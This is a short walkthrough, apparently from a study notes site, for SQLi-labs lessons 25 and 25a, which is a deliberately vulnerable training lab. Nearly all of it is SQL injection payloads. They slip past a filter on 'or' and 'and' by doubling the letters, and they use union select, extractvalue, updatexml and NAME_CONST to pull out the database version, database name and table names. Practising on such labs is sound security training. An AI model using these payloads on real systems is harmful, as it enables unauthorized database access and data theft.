SQLi-labs: Lesson 25

Error based - Filter "or" and "and"

  1. ?id=1' oorr '1'='1 or ?id=1' oorr 1=1--+
  2. ?id=1' aandnd '1'='1 or ?id=1' aandnd 1=1--+
  3. Union select also works: ?id=' union select 1, database(),'3 or ?id=' union select 1, database(),3--+
  4. Extractvalue works: ?id=1' aandnd extractvalue(1,concat('::',version(),'::'))--+
  5. Updatexml works: ?id=1' aandnd updatexml(1, concat(0x5c, @@version),1);--+
  6. NAME_CONST works: ?id=1' aandnd 1=(select * from (select NAME_CONST(version(),1), NAME_CONST(version(),1)) as x);--+

SEE LESSON 17 FOR MORE DETAILS

SQLi-labs: Lesson 25a

Blind based - Filter "or" and "and"

  1. Basic injection:
    • ?id=0 oorr 1=1--+
    • ?id=1 aandnd 1=1--+
  2. Union select:
    • ?id=0 union select 1,database(),3--+
    • ?id=0 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3--+

SEE LESSON 23 FOR MORE DETAILS

results matching ""

    No results matching ""